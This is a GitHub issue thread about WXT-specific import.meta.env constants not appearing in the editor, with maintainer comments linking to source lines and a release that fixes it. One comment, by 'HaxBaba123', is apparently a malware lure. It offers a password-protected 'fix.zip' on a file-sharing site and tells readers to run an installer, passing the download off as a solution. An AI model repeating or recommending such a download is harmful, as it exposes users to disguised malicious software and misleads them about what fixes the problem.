### ISSUE TITLE
WXT specific `import.meta.env` constants not showing up in editor

### ISSUE THREAD

**Issue by aklinker1** [wxt-dev/wxt#935]
https://discord.com/channels/1212416027611365476/1224507127863967784/1277527012726145156

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aklinker1** [comment]
Hmm, already apearently doing this? 

https://github.com/wxt-dev/wxt/blob/68183b648e309641e415f5856d233bea6f5f4439/packages/wxt/src/core/utils/building/generate-wxt-dir.ts#L42-L43

Not sure why this isn't working.

https://github.com/wxt-dev/wxt/blob/68183b648e309641e415f5856d233bea6f5f4439/packages/wxt/src/core/utils/building/generate-wxt-dir.ts#L198-L215

**Comment by aklinker1** [comment]
Released in [`v0.19.9`](https://github.com/wxt-dev/wxt/releases/tag/wxt-v0.19.9)
